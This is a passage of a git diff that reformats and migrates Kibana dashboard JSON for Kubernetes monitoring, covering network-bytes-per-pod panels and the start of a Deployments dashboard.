"metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "710b0f49-b955-4cb8-826e-e51b3e6e7271", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Network Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "710b0f49-b955-4cb8-826e-e51b3e6e7271", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Network Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.network.tx.bytes" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - 
"scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.network.tx.bytes" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "710b0f49-b955-4cb8-826e-e51b3e6e7271", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - 
"curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "710b0f49-b955-4cb8-826e-e51b3e6e7271", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", - "w": 24, - "x": 24, - "y": 49 + "layers": [ + { + "accessors": [ + 
"86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "7a1ccd34-5b1c-445b-8f1f-00d792c49104", - "title": "Network Outgoing Bytes per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Network Outgoing Bytes per Pod [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "72b97d6f-17f7-44b0-87a9-e272981c7565", + "w": 24, + "x": 0, + "y": 64 + }, + "panelIndex": "72b97d6f-17f7-44b0-87a9-e272981c7565", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "31f6a38e-250d-4a00-9f2a-af9c53aff800", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + 
"86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Network Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - { - "id": "metrics-*", - "name": "31f6a38e-250d-4a00-9f2a-af9c53aff800", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Network Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.network.rx.bytes" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": 
"kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.network.rx.bytes" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "31f6a38e-250d-4a00-9f2a-af9c53aff800", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": 
"a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "31f6a38e-250d-4a00-9f2a-af9c53aff800", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 15, - "i": "72b97d6f-17f7-44b0-87a9-e272981c7565", - "w": 24, - "x": 0, - "y": 64 + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "72b97d6f-17f7-44b0-87a9-e272981c7565", - "title": "Network Incoming Bytes per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" - } - ], - "timeRestore": false, - "title": "[Metrics Kubernetes] Pods", - "version": 1 - }, - "coreMigrationVersion": "8.6.0", - "created_at": "2023-05-11T17:29:51.931Z", - "id": "kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013", - "migrationVersion": { - "dashboard": "8.6.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", - "type": "index-pattern" - 
}, - { - "id": "metrics-*", - "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:f30047fb-d7fd-4873-9150-6e16c369fcc8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:9486d409-e044-43b7-a175-e25695e38cc4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:61027d7f-6398-4aec-b154-897b913481e4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "98677dcb-ab94-47e8-94ca-326470ee2380:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "98677dcb-ab94-47e8-94ca-326470ee2380:ace482cc-b33b-47c1-89b1-a710fe45195e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:81de779f-3d8f-4f90-9a93-08ecf5d96939", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:9d74e7d3-0a1c-4c8b-8635-1577d74797f7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"7a1ccd34-5b1c-445b-8f1f-00d792c49104:710b0f49-b955-4cb8-826e-e51b3e6e7271", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:31f6a38e-250d-4a00-9f2a-af9c53aff800", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2:optionsListDataView", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "controlGroup_c08d3539-51f7-4256-861b-c3c323edfb86:optionsListDataView", - "type": "index-pattern" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "controlGroup_4a85f45a-ea4c-4514-a71c-b15979915ce3:optionsListDataView", - "type": "index-pattern" - } + "title": "Network Incoming Bytes per Pod [Metrics Kubernetes]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Kubernetes] Pods", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", + 
"type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0a10c73f-959b-40e1-b1a2-609c3fd59914:f30047fb-d7fd-4873-9150-6e16c369fcc8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8775bc75-d36c-4e37-94e4-ca63300d9dd3:9486d409-e044-43b7-a175-e25695e38cc4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8e7901b2-cfc3-433d-9dcb-4af30c649efb:61027d7f-6398-4aec-b154-897b913481e4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "98677dcb-ab94-47e8-94ca-326470ee2380:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "98677dcb-ab94-47e8-94ca-326470ee2380:ace482cc-b33b-47c1-89b1-a710fe45195e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5575d413-c4a4-4e34-8605-54f82e5e05b3:81de779f-3d8f-4f90-9a93-08ecf5d96939", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "435eeb17-c28a-4bde-9c43-b85d8e463c03:9d74e7d3-0a1c-4c8b-8635-1577d74797f7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7a1ccd34-5b1c-445b-8f1f-00d792c49104:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"7a1ccd34-5b1c-445b-8f1f-00d792c49104:710b0f49-b955-4cb8-826e-e51b3e6e7271", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "72b97d6f-17f7-44b0-87a9-e272981c7565:31f6a38e-250d-4a00-9f2a-af9c53aff800", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_7c68c5e5-70ee-4a8d-88d5-dcd8c6dbd6d2:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_c08d3539-51f7-4256-861b-c3c323edfb86:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_4a85f45a-ea4c-4514-a71c-b15979915ce3:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json index da9ab17a533..ae09de03a49 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013.json 
@@ -1,926 +1,934 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"01b10632-f741-4099-981d-f1008020884b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"01b10632-f741-4099-981d-f1008020884b\",\"selectedOptions\":[],\"enhancements\":{}}},\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\",\"selectedOptions\":[],\"enhancements\":{}}},\"9e437628-d460-4697-9427-616333ef6947\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.deployment.name\",\"title\":\"Deployment Name\",\"id\":\"9e437628-d460-4697-9427-616333ef6947\",\"selectedOptions\":[],\"enhancements\":{}}}}" - }, - "description": "Metrics about Deployments", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0NywyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": 
"{\"01b10632-f741-4099-981d-f1008020884b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"01b10632-f741-4099-981d-f1008020884b\",\"selectedOptions\":[],\"enhancements\":{}}},\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"e2a1ee45-5917-4945-a7fd-f4ee281b8d6d\",\"selectedOptions\":[],\"enhancements\":{}}},\"9e437628-d460-4697-9427-616333ef6947\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.deployment.name\",\"title\":\"Deployment Name\",\"id\":\"9e437628-d460-4697-9427-616333ef6947\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Metrics about Deployments", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes 
DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 4, + "i": "58edcf0e-d21a-4dea-8b29-e5a8d9d4d738", + "w": 48, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes 
